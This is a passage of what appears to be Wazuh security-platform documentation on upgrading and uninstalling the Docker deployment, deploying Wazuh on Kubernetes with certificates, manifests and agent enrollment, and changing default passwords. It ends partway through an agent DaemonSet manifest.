  • The Wazuh dashboard reads its configuration from the config/wazuh_dashboard/opensearch_dashboards.yml file. You can adjust dashboard behavior or appearance by modifying parameters in this file. Refer to the OpenSearch documentation on Modifying the YAML files for details about the available variables you can override in this configuration.

Upgrading Wazuh Docker

This section describes how to upgrade the Wazuh deployment on Docker.

To upgrade to version 5.0.0, choose one of the following strategies.

Using the default Docker Compose files

Follow these steps to upgrade your deployment using the default docker-compose.yml file:

  1. Run the following command from your wazuh-docker/single-node/ or wazuh-docker/multi-node/ directory to stop the outdated environment:

    # docker compose down
    
  2. Update your local repository to fetch the latest tags:

    # git fetch --all --tags
    
  3. Check out the tag for the current version of wazuh-docker:

    # git checkout v5.0.0
    

    This command switches your local repository to the specified release tag, ensuring the deployment uses that version's exact configuration and files.

    Note

    Replace v5.0.0 with the tag of any other Wazuh version you want to upgrade to. You can run git tag -l to see all available versions.

  4. Start the upgraded Wazuh Docker environment using the docker compose command:

    # docker compose up -d
    

    Your data and certificates remain persistent because they are stored in mounted Docker volumes. This means upgrading the environment does not erase your existing configuration or indexed data.
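To confirm that the containers are running the upgraded images, you can list the stack's containers and the images they use. Depending on your Docker Compose version, the images subcommand may not be available; docker compose ps alone is enough to verify the stack is up.

# docker compose ps
# docker compose images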

Keeping your custom Docker Compose files

To upgrade your deployment while preserving your custom docker-compose.yml file, follow these steps:

Single-node stack
  1. Run the following command from your wazuh-docker/single-node/ directory to stop the outdated environment:

    # docker compose down
    
  2. If upgrading from a version earlier than 4.8, edit the single-node/config/wazuh_dashboard/opensearch_dashboards.yml file and update the defaultRoute parameter as follows:

    uiSettings.overrides.defaultRoute: /app/wz-home
    

    Optional: Modify the OPENSEARCH_JAVA_OPTS environment variable in the single-node/docker-compose.yml file to allocate more RAM to the Wazuh indexer container.

    environment:
    - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g"
    
  3. In single-node/generate-indexer-certs.yml, update the image tag of the generator service to the latest version and add the CERT_TOOL_VERSION environment variable.

    services:
       generator:
          image: wazuh/wazuh-certs-generator:0.0.4
          environment:
            - CERT_TOOL_VERSION=5.0
    
  4. Recreate the certificates after these changes.

    # docker compose -f generate-indexer-certs.yml run --rm generator
    

    Optional: Update old paths with the new ones based on the version you are upgrading from.

    Wazuh dashboard

    1. Edit single-node/config/wazuh_dashboard/opensearch_dashboards.yml and do the following replacements.

      • Replace /usr/share/wazuh-dashboard/config/certs/ with /usr/share/wazuh-dashboard/certs/.

    2. Edit single-node/docker-compose.yml and do the following replacements.

      • Replace /usr/share/wazuh-dashboard/config/certs/ with /usr/share/wazuh-dashboard/certs/.

    Wazuh indexer

    1. Edit the single-node/config/wazuh_indexer/wazuh.indexer.yml file and do the following replacements.

      • Replace ${OPENSEARCH_PATH_CONF}/certs/ with /usr/share/wazuh-indexer/config/certs/.

    2. Edit the single-node/docker-compose.yml file and do the following replacements.

      • Replace /usr/share/wazuh-indexer/plugins/opensearch-security/securityconfig/ with /usr/share/wazuh-indexer/opensearch-security/.

  5. Edit the docker-compose.yml file and update the image tags of the following services to the latest version.

    wazuh.manager:
       image: wazuh/wazuh-manager:5.0.0
    ...
    wazuh.indexer:
       image: wazuh/wazuh-indexer:5.0.0
    ...
    wazuh.dashboard:
       image: wazuh/wazuh-dashboard:5.0.0
    

    Optional: If you are upgrading from Wazuh version 4.3, add the variable related to the kibanaserver user.

    ...
    wazuh.dashboard:
       image: wazuh/wazuh-dashboard:5.0.0
       environment:
          - INDEXER_USERNAME=admin
          - INDEXER_PASSWORD=SecretPassword
          - WAZUH_API_URL=https://wazuh.manager
          - DASHBOARD_USERNAME=kibanaserver
          - DASHBOARD_PASSWORD=kibanaserver
    
  6. Replace the content of single-node/config/wazuh_cluster/wazuh_manager.conf file in your stack with the one from the v5.0.0 tag of the Wazuh Docker repository.

    # curl -sL https://raw.githubusercontent.com/wazuh/wazuh-docker/v5.0.0/single-node/config/wazuh_cluster/wazuh_manager.conf > single-node/config/wazuh_cluster/wazuh_manager.conf
    
  7. Start the new version of Wazuh using the docker compose command:

    # docker compose up -d
    
Multi-node stack
  1. Run the following command from your wazuh-docker/multi-node/ directory to stop the outdated environment:

    # docker compose down
    
  2. If upgrading from a version earlier than 4.8, edit the multi-node/config/wazuh_dashboard/opensearch_dashboards.yml file and update the defaultRoute parameter as follows:

    uiSettings.overrides.defaultRoute: /app/wz-home
    

    Optional: Modify the OPENSEARCH_JAVA_OPTS environment variable in the multi-node/docker-compose.yml file to allocate more RAM to the Wazuh indexer container.

    environment:
    - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g"
    
  3. In multi-node/generate-indexer-certs.yml, update the image tag of the generator service to the latest version and add the CERT_TOOL_VERSION environment variable.

    services:
       generator:
          image: wazuh/wazuh-certs-generator:0.0.4
          environment:
            - CERT_TOOL_VERSION=5.0
    
  4. Recreate the certificates after these changes.

    # docker compose -f generate-indexer-certs.yml run --rm generator
    

    Optional: Update these old paths with the new ones based on the version you are upgrading from.

    Wazuh dashboard

    1. Edit multi-node/config/wazuh_dashboard/opensearch_dashboards.yml and do the following replacements.

      • Replace /usr/share/wazuh-dashboard/config/certs/ with /usr/share/wazuh-dashboard/certs/.

    2. Edit multi-node/docker-compose.yml and do the following replacements.

      • Replace /usr/share/wazuh-dashboard/config/certs/ with /usr/share/wazuh-dashboard/certs/.

    Wazuh indexer

    1. Edit the multi-node/config/wazuh_indexer/wazuh1.indexer.yml, multi-node/config/wazuh_indexer/wazuh2.indexer.yml, and multi-node/config/wazuh_indexer/wazuh3.indexer.yml files and do the following replacements.

      • Replace ${OPENSEARCH_PATH_CONF}/certs/ with /usr/share/wazuh-indexer/config/certs/.

    2. Edit the multi-node/docker-compose.yml file and do the following replacements.

      • Replace /usr/share/wazuh-indexer/plugins/opensearch-security/securityconfig/ with /usr/share/wazuh-indexer/opensearch-security/.

  5. Edit the docker-compose.yml file and update the image tags of the following services to the latest version.

    wazuh.master:
       image: wazuh/wazuh-manager:5.0.0
    ...
    wazuh.worker:
       image: wazuh/wazuh-manager:5.0.0
    ...
    wazuh1.indexer:
       image: wazuh/wazuh-indexer:5.0.0
    ...
    wazuh2.indexer:
       image: wazuh/wazuh-indexer:5.0.0
    ...
    wazuh3.indexer:
       image: wazuh/wazuh-indexer:5.0.0
    ...
    wazuh.dashboard:
       image: wazuh/wazuh-dashboard:5.0.0
    

    Optional: If you are upgrading from Wazuh version 4.3, add the variable related to the kibanaserver user.

    ...
    wazuh.dashboard:
       image: wazuh/wazuh-dashboard:5.0.0
       environment:
          - OPENSEARCH_HOSTS="https://wazuh1.indexer:9200"
          - WAZUH_API_URL="https://wazuh.master"
          - API_USERNAME=wazuh-wui
          - API_PASSWORD=MyS3cr37P450r.*-
          - DASHBOARD_USERNAME=kibanaserver
          - DASHBOARD_PASSWORD=kibanaserver
    
  6. Replace the content of the following files in your stack with the ones from the v5.0.0 tag of the Wazuh Docker repository.

    • multi-node/config/wazuh_cluster/wazuh_manager.conf

      # curl -sL https://raw.githubusercontent.com/wazuh/wazuh-docker/v5.0.0/multi-node/config/wazuh_cluster/wazuh_manager.conf > multi-node/config/wazuh_cluster/wazuh_manager.conf
      
    • multi-node/config/wazuh_cluster/wazuh_worker.conf

      # curl -sL https://raw.githubusercontent.com/wazuh/wazuh-docker/v5.0.0/multi-node/config/wazuh_cluster/wazuh_worker.conf > multi-node/config/wazuh_cluster/wazuh_worker.conf
      
  7. Start the new version of Wazuh using the docker compose command:

    # docker compose up -d
    
Uninstalling the Wazuh Docker deployment

Follow these steps to uninstall your Wazuh Docker deployment from your Docker host:

  1. Navigate to the directory of your deployment model.

  2. Stop the stack:

    # docker compose down
    

    This command stops all running containers and removes them, but preserves your data volumes and configuration files.

  3. Optional: Delete persistent volumes.

    • List all volumes first to confirm what you want to delete:

      # docker volume ls
      
    • If you created custom volumes for logs, configuration, or data, remove them manually:

      # docker volume rm <VOLUME_ID>
      
    • Replace <VOLUME_ID> with the volume name(s) you want to delete.

  4. You can also perform steps 2 and 3 in a single command.

    Warning

    The -v flag permanently deletes all your Wazuh data, configurations, and logs. Use it only when you want to completely remove the deployment and start fresh.

    • Run the following to stop the stack and immediately remove all associated volumes:

      # docker compose down -v
      

Deployment on Kubernetes

In this section, we show the process of installing, upgrading, and uninstalling Wazuh on Kubernetes.

Kubernetes is an open source container orchestration engine. Containers are microservices packaged with their dependencies and configurations. Kubernetes is meant to run across a cluster, automating deployment, scaling, and management of containerized applications. It simplifies the operation of applications that span multiple containers deployed across multiple servers. For easy management and discovery, containers are grouped into pods, the basic operational unit for Kubernetes. Kubernetes pods are distributed among nodes to provide high availability. Kubernetes helps with networking, load balancing, security, and scaling across all Kubernetes nodes running your containers.

In this section of the documentation, we show how to clone the Wazuh Kubernetes repository, and set up SSL certificates. We also show how to apply the manifests and deploy the necessary pods and services for installing Wazuh on Kubernetes in the cloud and local environments. The other subsection in this documentation covers Kubernetes configuration, how to Upgrade Wazuh installed in Kubernetes, and how to Clean Up both clusters and volumes.

Kubernetes configuration

This section outlines how to configure Wazuh components within a Kubernetes cluster, including the manager, indexer, and dashboard. It describes the resource requirements, storage setup, and controller types used for each component.

Prerequisites

Before you begin, ensure that the following requirements are met:

  • A running Kubernetes cluster.

  • An Amazon EBS CSI driver IAM role for Amazon EKS deployments using Kubernetes version 1.23 and later. The CSI driver requires an assigned IAM role to work properly; for detailed instructions, refer to the AWS documentation on Creating the Amazon EBS CSI driver IAM role. The CSI driver must be installed for both new and existing deployments (see the check below).
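
    If you deployed the driver as an Amazon EKS add-on, you can verify its status with the AWS CLI, for example (replace <CLUSTER_NAME> with the name of your EKS cluster):

    # aws eks describe-addon --cluster-name <CLUSTER_NAME> --addon-name aws-ebs-csi-driver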

Resource requirements

Your cluster must have at least the following resources available:

  • 2 CPU units

  • 3 Gi of memory

  • 2 Gi of storage

Overview
StatefulSet and Deployment controllers

A StatefulSet manages pods based on identical container specifications. Unlike Deployments, StatefulSets maintain a persistent identity for each pod. Pods are created from the same specification, but are not interchangeable. Each pod retains a persistent identifier that survives rescheduling.

StatefulSets are useful for stateful applications like databases that save data to persistent storage. Wazuh manager and Wazuh indexer components maintain their states, so we use StatefulSets to ensure state persistence across Pod restarts.

Deployments are intended for stateless applications and are lightweight. The Wazuh dashboard doesn't need to maintain state, so it is deployed using a Deployment controller.

Persistent volumes (PV) are storage resources in the cluster. They have a lifecycle independent of any individual pod that uses them. This API object captures storage implementation details for NFS, iSCSI, or cloud-provider-specific storage systems.

We use persistent volumes to store data from both the Wazuh manager and the Wazuh indexer.

For more information, see the Kubernetes persistent volumes documentation.
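
For example, once the deployment described later in this section is applied, you can list the persistent volume claims backing the Wazuh manager and indexer pods:

$ kubectl get pvc -n wazuh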

Pods

A Pod is the smallest and most fundamental deployable unit in Kubernetes. It represents a single instance of a running process in your cluster. You can view how we build Wazuh Docker containers in our repository.

Wazuh master

The master pod contains the master node of the Wazuh server cluster. The master node centralizes and coordinates worker nodes. It ensures critical data remains consistent across the Wazuh server cluster. Management operations occur only on this node, so the agent enrollment service (authd) runs here.

Image: wazuh/wazuh-manager
Controller: StatefulSet

Wazuh worker

The Wazuh worker pods contain the worker nodes of the Wazuh server cluster. They receive agent events.

Image: wazuh/wazuh-manager
Controller: StatefulSet

Wazuh indexer

The Wazuh indexer pod ingests events received from Filebeat.

Image: wazuh/wazuh-indexer
Controller: StatefulSet

Wazuh dashboard

The Wazuh dashboard pod provides visualization of Wazuh indexer data, Wazuh agent information, and Wazuh server configuration.

Image: wazuh/wazuh-dashboard
Controller: Deployment

Services

Wazuh indexer and dashboard

  • wazuh-indexer: Communication for Wazuh indexer nodes.

  • indexer: The Wazuh indexer API used by the Wazuh dashboard to read/write alerts.

  • dashboard: Wazuh dashboard service. https://wazuh.<YOUR_DOMAIN>.com:443

Wazuh server

  • wazuh-master: Wazuh API (wazuh-master.<YOUR_DOMAIN>.com:55000) and agent registration service, authd (wazuh-master.<YOUR_DOMAIN>.com:1515).

  • wazuh-workers: Reporting service (wazuh-manager.<YOUR_DOMAIN>.com:1514).

  • wazuh-cluster: Communication for Wazuh manager nodes.

Deployment

This section covers deploying Wazuh on Kubernetes for Amazon EKS and Local Kubernetes clusters, from environment preparation to verifying that all components are running correctly.

Clone the Wazuh Kubernetes repository for the necessary services and pods:

$ git clone https://github.com/wazuh/wazuh-kubernetes.git -b v5.0.0 --depth=1
$ cd wazuh-kubernetes
Setup SSL certificates

Perform the steps below to generate the required certificates for the deployment:

  1. Generate self-signed certificates for the Wazuh indexer cluster using the script at wazuh/certs/indexer_cluster/generate_certs.sh or provide your own certificates.

    # wazuh/certs/indexer_cluster/generate_certs.sh
    
    Root CA
    Admin cert
    create: admin-key-temp.pem
    create: admin-key.pem
    create: admin.csr
    Ignoring -days without -x509; not generating a certificate
    create: admin.pem
    Certificate request self-signature ok
    subject=C=US, L=California, O=Company, CN=admin
    * Node cert
    create: node-key-temp.pem
    create: node-key.pem
    create: node.csr
    Ignoring -days without -x509; not generating a certificate
    create: node.pem
    Certificate request self-signature ok
    subject=C=US, L=California, O=Company, CN=indexer
    * dashboard cert
    create: dashboard-key-temp.pem
    create: dashboard-key.pem
    create: dashboard.csr
    Ignoring -days without -x509; not generating a certificate
    create: dashboard.pem
    Certificate request self-signature ok
    subject=C=US, L=California, O=Company, CN=dashboard
    * Filebeat cert
    create: filebeat-key-temp.pem
    create: filebeat-key.pem
    create: filebeat.csr
    Ignoring -days without -x509; not generating a certificate
    create: filebeat.pem
    Certificate request self-signature ok
    subject=C=US, L=California, O=Company, CN=filebeat
    
  2. Generate self-signed certificates for the Wazuh dashboard using the script at wazuh/certs/dashboard_http/generate_certs.sh or provide your own certificates.

    # wazuh/certs/dashboard_http/generate_certs.sh
    

    The required certificates are imported via secretGenerator in the kustomization.yml file:

    secretGenerator:
        - name: indexer-certs
          files:
            - certs/indexer_cluster/root-ca.pem
            - certs/indexer_cluster/node.pem
            - certs/indexer_cluster/node-key.pem
            - certs/indexer_cluster/dashboard.pem
            - certs/indexer_cluster/dashboard-key.pem
            - certs/indexer_cluster/admin.pem
            - certs/indexer_cluster/admin-key.pem
            - certs/indexer_cluster/filebeat.pem
            - certs/indexer_cluster/filebeat-key.pem
        - name: dashboard-certs
          files:
            - certs/dashboard_http/cert.pem
            - certs/dashboard_http/key.pem
            - certs/indexer_cluster/root-ca.pem
    
Setup storage class (optional for non-EKS cluster)

The storage class provisioner varies depending on your cluster. Edit the envs/local-env/storage-class.yaml file to set the provisioner that matches your cluster type.

Check your storage class by running kubectl get sc:

# kubectl get sc
NAME                          PROVISIONER            RECLAIMPOLICY   VOLUMEBINDINGMODE   ALLOWVOLUMEEXPANSION   AGE
elk-gp2                       microk8s.io/hostpath   Delete          Immediate           false                  67d
microk8s-hostpath (default)   microk8s.io/hostpath   Delete          Immediate           false                  54d

The provisioner column displays microk8s.io/hostpath.
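
As a sketch, a storage-class.yaml matching the microk8s example above could look like the following (the metadata name shown here is illustrative; keep whatever name your manifests already reference):

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: wazuh-storage   # illustrative name
provisioner: microk8s.io/hostpath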

Apply all manifests

There are two variants of the manifest: one for EKS clusters located in envs/eks and the second for other cluster types located in envs/local-env.

You can adjust cluster resources by editing patches in envs/eks/ or envs/local-env/. You can also tune CPU, memory, and storage for persistent volumes of each cluster object. Remove patches from kustomization.yml or modify patch values to undo changes.

Deploy the cluster using the kustomization.yml file:

  • EKS cluster

    # kubectl apply -k envs/eks/
    
  • Other cluster types

    # kubectl apply -k envs/local-env/
    
Verifying the deployment
Namespace

Run the following command to check that the Wazuh namespace is active:

$ kubectl get namespaces | grep wazuh
wazuh         Active    12m
Services

Run the command below to view all running services in the Wazuh namespace:

$ kubectl get services -n wazuh
NAME                  TYPE           CLUSTER-IP       EXTERNAL-IP        PORT(S)                          AGE
indexer               ClusterIP      xxx.yy.zzz.24    <none>             9200/TCP                         12m
dashboard             ClusterIP      xxx.yy.zzz.76    <none>             5601/TCP                         11m
wazuh                 LoadBalancer   xxx.yy.zzz.209   internal-a7a8...   1515:32623/TCP,55000:30283/TCP   9m
wazuh-cluster         ClusterIP      None             <none>             1516/TCP                         9m
wazuh-indexer         ClusterIP      None             <none>             9300/TCP                         12m
wazuh-workers         LoadBalancer   xxx.yy.zzz.26    internal-a7f9...   1514:31593/TCP                   9m

Note

Take note of the External IP addresses for the wazuh and wazuh-workers services, as they are required during the Wazuh agent installation.

The wazuh External IP is used as the Wazuh Registration Server IP address (port 1515), while the wazuh-workers External IP is used as the Wazuh Manager IP address for event transmission (port 1514) after enrollment.

Deployments

Run the command below to check for the deployments in the Wazuh namespace:

$ kubectl get deployments -n wazuh
NAME             DESIRED   CURRENT   UP-TO-DATE   AVAILABLE   AGE
wazuh-dashboard  1         1         1            1           11m
Statefulset

Run the command below to check the active StatefulSets in the Wazuh namespace:

$ kubectl get statefulsets -n wazuh
NAME                   READY   AGE
wazuh-indexer          3/3     15m
wazuh-manager-master   1/1     15m
wazuh-manager-worker   2/2     15m
Pods

Run the command below to view the pods status in the Wazuh namespace:

$ kubectl get pods -n wazuh
NAME                              READY     STATUS    RESTARTS   AGE
wazuh-indexer-0                   1/1       Running   0          15m
wazuh-dashboard-f4d9c7944-httsd   1/1       Running   0          14m
wazuh-manager-master-0            1/1       Running   0          12m
wazuh-manager-worker-0-0          1/1       Running   0          11m
wazuh-manager-worker-1-0          1/1       Running   0          11m
Enrolling a Wazuh agent

Follow the steps below to enroll a Wazuh agent to a Wazuh manager running in a Kubernetes environment.

  1. Execute this command on the Kubernetes cluster and note the External IP of the wazuh and wazuh-workers load balancers:

    # kubectl get services -n wazuh
    
    NAME                  TYPE           CLUSTER-IP       EXTERNAL-IP        PORT(S)                          AGE
    indexer               ClusterIP      xxx.yy.zzz.24    <none>             9200/TCP                         12m
    dashboard             ClusterIP      xxx.yy.zzz.76    <none>             5601/TCP                         11m
    wazuh                 LoadBalancer   xxx.yy.zzz.209   internal-a7a8...   1515:32623/TCP,55000:30283/TCP   9m
    wazuh-cluster         ClusterIP      None             <none>             1516/TCP                         9m
    wazuh-indexer         ClusterIP      None             <none>             9300/TCP                         12m
    wazuh-workers         LoadBalancer   xxx.yy.zzz.26    internal-a7f9...   1514:31593/TCP                   9m
    
  2. Set the following Wazuh agent deployment variables to simplify the installation, enrollment, and configuration process of the Wazuh agent.

    • WAZUH_MANAGER: External IP of the wazuh-workers load balancer.

    • WAZUH_REGISTRATION_SERVER: External IP of the wazuh load balancer.

    • WAZUH_REGISTRATION_PASSWORD: The default password for deploying agents in Wazuh on Kubernetes is password. This password is used for enrolling new agents. The /var/ossec/etc/authd.pass file contains this password. For more information, see Using password authentication.

    • WAZUH_AGENT_NAME: Name of the new Wazuh agent to be enrolled.

  3. After setting the deployment variables, install the Wazuh agent using the Wazuh agent installation guide.

  4. The example below shows the command you must run to set the deployment variables and install the Wazuh agent on a Linux endpoint after adding the Wazuh repository.

    # WAZUH_MANAGER="<EXTERNAL_IP_WAZUH_WORKER>" WAZUH_REGISTRATION_SERVER="<EXTERNAL_IP_WAZUH>" WAZUH_REGISTRATION_PASSWORD="<PASSWORD>" WAZUH_AGENT_NAME="WAZUH_K8S_AGENT"  \
      apt-get install wazuh-agent
    

    Replace:

    • EXTERNAL_IP_WAZUH_WORKER with the external IP address of the wazuh-workers load balancer service.

    • EXTERNAL_IP_WAZUH with the external IP address of the wazuh load balancer service.

    • PASSWORD with the password used to enroll agents.

    • WAZUH_K8S_AGENT with the Wazuh agent name that will be used for enrollment.

  5. Enable and start the Wazuh agent service.

    # systemctl daemon-reload
    # systemctl enable wazuh-agent
    # systemctl start wazuh-agent
    

To learn more about enrolling Wazuh agents, see the Wazuh agent enrollment section of the documentation.

Accessing Wazuh dashboard

If you created domain names for the services, access the dashboard using the URL https://wazuh.<YOUR_DOMAIN>.com. Otherwise, access the Wazuh dashboard using the external IP address or hostname that your cloud provider assigned.

Check the services to view the external IP:

$ kubectl get services -o wide -n wazuh
NAME                  TYPE           CLUSTER-IP       EXTERNAL-IP                      PORT(S)                          AGE       SELECTOR
dashboard             LoadBalancer   xxx.xx.xxx.xxx   xxx.xx.xxx.xxx                   80:31831/TCP,443:30974/TCP       15m       app=wazuh-dashboard

Note

For a local cluster deployment where the external IP address is not accessible, you can access the Wazuh dashboard using a port-forward as shown below:

# kubectl -n wazuh port-forward --address <KUBERNETES_HOST> service/dashboard 8443:443

Replace <KUBERNETES_HOST> with the IP address of the Kubernetes host.

The Wazuh dashboard is accessible at https://<KUBERNETES_HOST>:8443.

The default credentials are admin:SecretPassword.

Change the password of Wazuh users

Improve security by changing default passwords for Wazuh users. There are two categories of Wazuh users:

Wazuh indexer users

Before starting the password change process, log out of your Wazuh dashboard session. Failing to do so might result in errors when accessing Wazuh after changing user passwords due to persistent session cookies.

To change the password of the default admin and kibanaserver users, do the following.

Warning

If you have custom users, add them to the internal_users.yml file. Otherwise, executing this procedure deletes them.

Set a new password hash
  1. Start a Bash shell in the wazuh-indexer-0 pod.

    # kubectl exec -it wazuh-indexer-0 -n wazuh -- /bin/bash
    
  2. Run these commands to generate the hash of your new password. When prompted, input the new password and press Enter.

    $ export JAVA_HOME=/usr/share/wazuh-indexer/jdk
    $ bash /usr/share/wazuh-indexer/plugins/opensearch-security/tools/hash.sh
    

    Warning

    Do not use the $ or & characters in your new password. These characters can cause errors during deployment.

  3. Copy the generated hash and exit the Bash shell.

  4. Open the wazuh/indexer_stack/wazuh-indexer/indexer_conf/internal_users.yml file. Locate the block for the user whose password you want to change and replace the hash:

    • admin user

      ...
      admin:
          hash: "<ADMIN_PASSWORD_HASH>"
          reserved: true
          backend_roles:
          - "admin"
          description: "Demo admin user"
      
      ...
      

      Replace <ADMIN_PASSWORD_HASH> with the password hash generated in the previous step.

    • kibanaserver user

      ...
      kibanaserver:
          hash: "<KIBANASERVER_PASSWORD_HASH>"
          reserved: true
          description: "Demo kibanaserver user"
      
      ...
      

      Replace <KIBANASERVER_PASSWORD_HASH> with the password hash generated in the previous step.

Setting the new password
  1. Encode your new password in base64 format. Use the -n option with the echo command to avoid appending a trailing newline character, which would change the encoded value.

    # echo -n "NewPassword" | base64
    
  2. Edit the indexer or dashboard secrets configuration file as follows, replacing the value of the password field with the base64 encoded password.

    • To change the admin user password, edit the wazuh/secrets/indexer-cred-secret.yaml file.

      ...
      apiVersion: v1
      kind: Secret
      metadata:
          name: indexer-cred
      data:
          username: YWRtaW4=              # string "admin" base64 encoded
          password: U2VjcmV0UGFzc3dvcmQ=  # string "SecretPassword" base64 encoded
      ...
      
    • To change the kibanaserver user password, edit the wazuh/secrets/dashboard-cred-secret.yaml file.

      ...
      apiVersion: v1
      kind: Secret
      metadata:
          name: dashboard-cred
      data:
          username: a2liYW5hc2VydmVy  # string "kibanaserver" base64 encoded
          password: a2liYW5hc2VydmVy  # string "kibanaserver" base64 encoded
      ...
      
Applying the changes
  1. Apply the manifest changes

    • EKS cluster

      # kubectl apply -k envs/eks/
      
    • Other cluster types

      # kubectl apply -k envs/local-env/
      
  2. Start a new Bash shell in the wazuh-indexer-0 pod.

    # kubectl exec -it wazuh-indexer-0 -n wazuh -- /bin/bash
    
  3. Set the following variables:

    export INSTALLATION_DIR=/usr/share/wazuh-indexer
    export CONFIG_DIR=$INSTALLATION_DIR/config
    CACERT=$CONFIG_DIR/certs/root-ca.pem
    KEY=$CONFIG_DIR/certs/admin-key.pem
    CERT=$CONFIG_DIR/certs/admin.pem
    export JAVA_HOME=/usr/share/wazuh-indexer/jdk
    
  4. Wait for the Wazuh indexer to initialize properly. The waiting time can vary from two to five minutes. It depends on the size of the cluster, the assigned resources, and the speed of the network. Then, run the securityadmin.sh script to apply all changes.

    $ bash /usr/share/wazuh-indexer/plugins/opensearch-security/tools/securityadmin.sh -cd $CONFIG_DIR/opensearch-security/ -nhnv -cacert  $CACERT -cert $CERT -key $KEY -p 9200 -icl -h $NODE_NAME
    
  5. Force the Wazuh dashboard deployment rollout to update the component credentials.

    $ kubectl rollout restart deploy/wazuh-dashboard -n wazuh
    
  6. Delete all Wazuh manager pods to update the component credentials.

    $ kubectl delete -n wazuh pod/wazuh-manager-master-0 pod/wazuh-manager-worker-0-0 pod/wazuh-manager-worker-1-0
    
  7. Log in to the Wazuh dashboard using the new credentials.

Wazuh server API users

The wazuh-wui user is the default user for connecting to the Wazuh server API. Follow the steps below to change its password.

Note

The password for Wazuh server API users must be between 8 and 64 characters long. It must contain at least one uppercase and one lowercase letter, a number, and a symbol.

  1. Encode your new password in base64 format. Use the -n option with the echo command to avoid appending a trailing newline character, which would change the encoded value.

    # echo -n "NewPassword" | base64
    
  2. Edit the wazuh/secrets/wazuh-api-cred-secret.yaml file and replace the value of the password field.

    apiVersion: v1
    kind: Secret
    metadata:
        name: wazuh-api-cred
        namespace: wazuh
    data:
        username: d2F6dWgtd3Vp          # string "wazuh-wui" base64 encoded
        password: TXlTM2NyMzdQNDUwci4qLQ==  # string "MyS3cr37P450r.*-" base64 encoded
    
  3. Apply the manifest changes.

    # kubectl apply -k envs/eks/
    
  4. Restart the Wazuh manager and Wazuh dashboard pods so they pick up the new credentials.

    # kubectl delete pod -n wazuh wazuh-manager-master-0 wazuh-manager-worker-0-0 wazuh-manager-worker-1-0 wazuh-dashboard-f4d9c7944-httsd
    
Agents

The Wazuh agent can be deployed directly within your Kubernetes environment to monitor workloads, pods, and container activity. This setup provides visibility into the cluster’s runtime behavior, helping detect threats and configuration issues at the container and node levels.

There are two main deployment models for Wazuh agents in Kubernetes:

  • DaemonSet deployment where one Wazuh agent runs on each node to monitor the node and all containers on that node.

  • Sidecar deployment where the Wazuh agent runs as a companion container alongside a specific application pod to monitor that application only.

Deploying the Wazuh Agent as a DaemonSet

This is the most common approach for full-cluster monitoring. Each node runs one agent, ensuring complete coverage without manual intervention when new nodes are added.

  1. Create the Wazuh Agent DaemonSet manifest wazuh-agent-daemonset.yaml:

    apiVersion: v1
    kind: Namespace
    metadata:
      name: wazuh-daemonset
    ---
    apiVersion: apps/v1
    kind: DaemonSet
    metadata:
      name: wazuh-agent
      namespace: wazuh-daemonset
    spec:
      selector:
        matchLabels:
          app: wazuh-agent
      template:
        metadata:
          labels:
            app: wazuh-agent
        spec:
          serviceAccountName: default
          terminationGracePeriodSeconds: 20
    
          #        INIT CONTAINERS
          initContainers:
            # 1) Clean stale PID / lock files
            - name: cleanup-ossec-stale
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  echo "[init] Cleaning old locks..."
                  mkdir -p /agent/var/run /agent/queue/ossec
                  rm -f /agent/var/run/*.pid || true
                  rm -f /agent/queue/ossec/*.lock || true
              volumeMounts:
                - name: ossec-data
                  mountPath: /agent
            # 2) Seed /var/ossec into hostPath (first run only)
            - name: seed-ossec-tree
              image: wazuh/wazuh-agent:5.0.0
              imagePullPolicy: IfNotPresent
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  echo "[init] Checking if seeding is required..."
                  if [ ! -d /agent/bin ]; then
                    echo "[init] Seeding /var/ossec to hostPath..."
                    tar -C /var/ossec -cf - . | tar -C /agent -xpf -
                  else
                    echo "[init] Existing data found, skipping seed"
                  fi
              volumeMounts:
                - name: ossec-data
                  mountPath: /agent
            # 3) Fix ownership/permissions
            - name: fix-permissions
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  echo "[init] Fixing permissions..."
                  for d in etc logs queue var rids tmp "active-response"; do
                    [ -d "/agent/$d" ] && chown -R 999:999 "/agent/$d"
                  done
                  chown -R 0:0 /agent/bin /agent/lib || true
                  find /agent/bin -type f -exec chmod 0755 {} \; || true
              volumeMounts:
                - name: ossec-data
                  mountPath: /agent
            # 4) Write ossec.conf with PASSWORD ENROLLMENT
            - name: write-ossec-config
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              env:
                - name: WAZUH_MANAGER
                  value: "<EXTERNAL_IP_WAZUH_WORKER>"
                - name: WAZUH_PORT
                  value: "1514"
                - name: WAZUH_PROTOCOL
                  value: "tcp"
                - name: WAZUH_REGISTRATION_SERVER
                  value: "<EXTERNAL_IP_WAZUH>"
                - name: WAZUH_REGISTRATION_PORT
                  value: "1515"
                - name: NODE_NAME
                  valueFrom:
                    fieldRef:
                      fieldPath: spec.nodeName
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  echo "[init] Writing ossec.conf..."
                  mkdir -p /agent/etc
                  cat > /agent/etc/ossec.conf <<EOF
                  <ossec_config>
                    <client>
                      <server>
                        <address>${WAZUH_MANAGER}</address>
                        <port>${WAZUH_PORT}</port>
                        <protocol>${WAZUH_PROTOCOL}</protocol>
                      </server>
                      <enrollment>
                        <enabled>yes</enabled>
                        <agent_name>${NODE_NAME}</agent_name>
                        <manager_address>${WAZUH_REGISTRATION_SERVER}</manager_address>
                        <port>${WAZUH_REGISTRATION_PORT}</port>
                        <authorization_pass_path>/var/ossec/etc/authd.pass</authorization_pass_path>
                      </enrollment>
                    </client>
                  </ossec_config>
                  EOF
                  chown 999:999 /agent/etc/ossec.conf
                  chmod 0640 /agent/etc/ossec.conf
              volumeMounts:
                - name: ossec-data
                  mountPath: /agent
    
            # 5) Copy authd.pass from Secret and fix ownership
            - name: fix-authd-pass-perms
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  echo "[init] Copying authd.pass from Secret..."
                  mkdir -p /agent/etc
                  cp /secret/authd.pass /agent/etc/authd.pass
                  chown 0:999 /agent/etc/authd.pass
                  chmod 0640 /agent/etc/authd.pass
